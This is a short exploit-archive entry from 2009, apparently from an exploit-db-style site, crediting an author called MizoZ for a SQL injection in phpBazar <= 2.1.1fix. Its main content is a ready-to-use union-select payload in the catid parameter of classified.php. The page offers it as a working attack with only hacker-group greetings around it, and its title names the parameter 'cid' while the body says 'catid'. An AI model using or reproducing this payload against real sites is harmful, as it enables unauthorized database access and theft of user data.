[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : phpBazar <= 2.1.1fix (cid) SQL Injection
# Published : 2009-11-28
# Author : MizoZ
# Previous Title : WordPress 2.0 - 2.7.1 admin.php Module Configuration Security Bypass Vulnerability
# Next Title : PHP "multipart/form-data" Denial of Service Exploit (Python)
/*
Author : MizoZ [from MA]
Group : EvilWay, evilway[at]mail[dot]com
Email : mizozx[at]gmail[dot]com
Greetz : Zuka, Dyle !!
MABROOK L3IIIIIIIIIID
*/
The vulnerability is in the $_GET['catid'] , exploit :
http://server/classified.php?catid=2+and+1=0+union+all+select+1,2,3,4,5,6,7--